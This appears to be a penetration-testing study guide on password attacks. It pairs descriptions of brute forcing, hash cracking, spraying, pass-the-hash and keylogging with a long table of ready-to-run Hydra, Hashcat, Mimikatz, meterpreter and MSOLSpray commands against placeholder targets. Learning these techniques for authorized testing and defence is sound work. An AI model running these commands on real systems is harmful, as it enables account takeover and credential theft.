Password Attacks

---

1. Introduction to Password Attacks

Password attacks aim to uncover valid credentials by exploiting weaknesses in password management, storage, or selection. Effective password attacks often rely on weak passwords, poor encryption practices, or unpatched systems.

2. Common Types of Password Attacks

a. Brute Force Attack

• Description: Attempts every possible combination of characters to guess the password.

• Tools: Hydra, John the Ripper, Hashcat.

• Pros & Cons: Effective for shorter passwords but time-consuming for complex ones.

• Command Example:

  hydra -l user -P /path/to/wordlist.txt <target_IP> ssh

b. Dictionary Attack

• Description: Uses a predefined list of likely passwords to attempt matches.

• Tools: Hashcat, Medusa, John the Ripper.

• Pros & Cons: Faster than brute force but limited by the quality of the dictionary.

• Resources for Wordlists:

  • SecLists on GitHub

  • Weakpass

c. Hybrid Attack

• Description: Combines dictionary words with character variations, like appending numbers or symbols.

• Tools: Hashcat with hybrid mode, John the Ripper.

• Pros & Cons: Targets passwords that follow predictable patterns effectively.

• Command Example:

  hashcat -a 6 -m <hash_type> <hash_file> /path/to/wordlist.txt

d. Rainbow Table Attack

• Description: Uses precomputed tables of hashed passwords to quickly find matches.

• Tools: Rainbow Crack, Ophcrack.

• Pros & Cons: Very fast if the table matches the hashing algorithm but requires significant storage.

• Rainbow Table Resources:

  • Project RainbowCrack
  • CrackStation

e. Credential Stuffing

• Description: Reuses breached username-password pairs across multiple accounts.

• Tools: Sentry MBA, Snipr, OpenBullet.

• Pros & Cons: Effective against users who reuse passwords but limited by the availability of breached data.

• Resources for Credential Dumps:

  • Have I Been Pwned
  • Dehashed

f. Password Spraying

• Description: Attempts a few common passwords across many accounts to avoid account lockouts.

• Tools: CrackMapExec, Ruler, Spraying Toolkit.

• Pros & Cons: Effective against organizations with weak password policies but can be detected by activity monitoring.

---

3. Popular Password Hacking Tools

a. John the Ripper

• Description: One of the most popular open-source password cracking tools.

• Capabilities: Supports many hashing algorithms, custom rules, and has a wide range of cracking modes.

• Resources: John the Ripper Documentation

b. Hashcat

• Description: A high-performance password cracker optimized for GPU processing.

• Capabilities: Supports multiple attack modes and advanced rules.

• Resources: Hashcat Wiki

c. Hydra

• Description: A fast network login cracker for numerous protocols (SSH, FTP, HTTP, etc.).

• Capabilities: Brute-forcing and dictionary attacks across various protocols.

• Resources: Hydra GitHub Repository

d. Medusa

• Description: A versatile brute-forcing tool that supports many protocols.

• Capabilities: Known for its speed and flexibility.

• Resources: Medusa Documentation

e. CrackMapExec

• Description: A Swiss Army knife for pentesters that supports spraying, brute-forcing, and exploitation.

• Capabilities: Integrated with Metasploit for extensive password attacks on Windows.

• Resources: CrackMapExec GitHub

f. Ophcrack

• Description: Uses rainbow tables for cracking Windows LM and NTLM hashes.

• Capabilities: Specialized in Windows passwords.

• Resources: Ophcrack Official Site

---

4. Specialized Password Attack Techniques

a. Man-in-the-Middle (MitM) Attacks

• Description: Intercepts passwords as they travel over the network.

• Tools: Ettercap, MITMf, Bettercap.

• Resources: Bettercap Documentation

b. Pass-the-Hash

• Description: Uses hashed passwords to authenticate without cracking them.

• Tools: Mimikatz, Pass-the-Hash Toolkit.

• Resources: Mimikatz GitHub

c. Keylogging and Malware

• Description: Captures keystrokes to retrieve passwords directly from user input.

• Tools: Metasploit (keylogger payloads), Cobalt Strike.

• Pros & Cons: Effective, but requires malware delivery and installation.

d. Phishing and Social Engineering

• Description: Tricking users into revealing their passwords via fake login pages or deceptive requests.

• Tools: Gophish, SET (Social Engineering Toolkit).

• Resources: Gophish GitHub

---

5. Hash Cracking Techniques and Tools

a. NTLM and LM Hash Cracking

• Tools: Cain and Abel, Ophcrack.

• Command Example:

  john --format=NT hashfile

b. SHA-1 and SHA-256 Cracking

• Tools: Hashcat, John the Ripper.

• Command Example:

  hashcat -m 100 hashfile /path/to/wordlist.txt

c. PBKDF2 and bcrypt Cracking

• Tools: Hashcat, JtR.

• Resources: Hashcat Hash Modes

---

6. Guides and Resources for Further Learning

• General Password Attack Guide: OWASP Password Attack Cheat Sheet
• Understanding Hash Functions: NIST Guide to Cryptographic Hashes
• Advanced Cracking Techniques: Hashcat Advanced Cracking Techniques

---

Conclusion

This extensive look at password attacks illustrates the variety of tools and techniques available to an attacker and how each method can be mitigated with strong security practices. In practice, penetration testers should select methods based on target context, password strength, and network defenses. As password attacks continue to evolve, regularly reviewing and updating this knowledge with new tools and methods will ensure a strong foundation in penetration testing and cybersecurity.

Below is a comprehensive table of common password attack vectors, primary tools used for each, and example usages. This will provide an extensive reference list for various attack techniques, covering both standard and specialized tools.

Attack Vector	Primary Tool	Example Usage
Brute Force	Hydra	hydra -l user -P /path/to/wordlist.txt <target_IP> ssh
Dictionary Attack	John the Ripper	john --wordlist=/path/to/wordlist.txt hashfile
Hybrid Attack	Hashcat	hashcat -a 6 -m 1000 hashfile /path/to/wordlist.txt
Rainbow Table Attack	Ophcrack	ophcrack -t rainbow-table-file hashfile
Credential Stuffing	Snipr	Uses breach lists for multi-account testing
Password Spraying	CrackMapExec	crackmapexec smb <target_IP> -u users.txt -p common-passwords.txt
Keylogging Attack	Metasploit	meterpreter > keyscan_start
Phishing	Gophish	Set up phishing campaign targeting email credentials
Pass-the-Hash	Mimikatz	sekurlsa::pth /user:Admin /domain:domain /ntlm:<NTLM_HASH> /run:powershell.exe
Hash Cracking (NTLM)	Hashcat	hashcat -m 1000 hashfile /path/to/wordlist.txt
Hash Cracking (bcrypt)	John the Ripper	john --format=bcrypt hashfile
LM Hash Cracking	Cain and Abel	Load hashes and run automated cracking
SSH Brute Force	Hydra	hydra -l root -P passwords.txt ssh://<target_IP>
HTTP Basic Auth Brute Force	Medusa	medusa -h <target_IP> -U users.txt -P passwords.txt -M http
FTP Brute Force	Hydra	hydra -l anonymous -P passwords.txt ftp://<target_IP>
SMB Password Attack	CrackMapExec	crackmapexec smb <target_IP> -u admin -p passwords.txt
SQL Database Password Cracking	SQLMap	sqlmap -u <URL> --crack --passwords
WPA2 Wi-Fi Cracking	aircrack-ng	aircrack-ng -w /path/to/wordlist.txt <capture-file>
Email Phishing with Spoofed Links	SET (Social-Engineer Toolkit)	Phishing module setup targeting email collection
Reverse Brute Force	Hydra	hydra -L usernames.txt -p commonpassword <target_IP> ssh
Multi-Protocol Password Testing	Medusa	Supports SMB, HTTP, FTP, Telnet, etc.
Telnet Brute Force	Hydra	hydra -l root -P passwords.txt telnet://<target_IP>
RDP Brute Force	Hydra	hydra -l Administrator -P passwords.txt rdp://<target_IP>
Cisco Router Cracking	Ncrack	ncrack -p 23 --user root --pass passwords.txt <target_IP>
DNS Zone Transfer Attempt	nslookup	nslookup -type=any -query=AXFR <target_domain>
LDAP Password Attack	Medusa	medusa -h <target_IP> -u user -P passwords.txt -M ldap
Telnet Credential Guessing	Hydra	hydra -l admin -P passwords.txt telnet://<target_IP>
SNMP Community String Brute Force	Onesixtyone	onesixtyone -c community-strings.txt <target_IP>
OpenVPN Brute Force	Hydra	hydra -l user -P passwords.txt openvpn://<target_IP>
Apache Tomcat Manager Brute Force	Hydra	hydra -l admin -P passwords.txt http-get://<target_IP>:8080/manager/html
XMPP Brute Force	Hydra	hydra -l user -P passwords.txt xmpp://<target_IP>
SIP/VoIP Credential Guessing	Svmap	Scans for SIP servers and attempts weak password logins
Oracle DB Password Attack	ODAT	odat passwordguesser -s <target_IP> -U usernames.txt -P passwords.txt
MSSQL Password Cracking	Hydra	hydra -l sa -P passwords.txt mssql://<target_IP>
Kerberos TGT Brute Forcing	Kerbrute	kerbrute bruteuser -d domain.com users.txt
RADIUS Brute Force	Medusa	medusa -h <target_IP> -u user -P passwords.txt -M radius
MongoDB Password Attack	Hydra	hydra -l user -P passwords.txt mongodb://<target_IP>
Redis Unauthorized Access Check	Nmap	nmap -p 6379 --script redis-brute <target_IP>
MacOS Keychain Exploit	Metasploit	Post-exploitation module in meterpreter for keychain access
VNC Password Brute Force	Hydra	hydra -P passwords.txt vnc://<target_IP>
VoIP/SIP Password Cracking	Hydra	hydra -L users.txt -P passwords.txt sip://<target_IP>
Bitcoin Wallet Brute Force	btcrecover	Uses known wallet details to attempt password recovery
Azure AD Password Spraying	MSOLSpray	python3 MSOLSpray.py -u users.txt -p Password123
Office365 Credential Testing	AADInternals	Uses PowerShell to enumerate and test credentials
ZIP File Password Cracking	fcrackzip	fcrackzip -u -D -p /path/to/wordlist.txt <file.zip>
PDF Password Cracking	pdfcrack	pdfcrack -f <file.pdf> -w /path/to/wordlist.txt
RAR File Password Cracking	RarCrack	rarcrack <file.rar> --type rar --dictionary /path/to/wordlist.txt
Network Share Password Cracking	CrackMapExec	crackmapexec smb <target_IP> -u usernames.txt -p passwords.txt

---

This table should give a thorough understanding of various password attack vectors, tools, and sample commands to use. For each method, there are nuances to configurations and optimizations, so consulting tool-specific documentation and adjusting commands to your target environment can maximize effectiveness.

---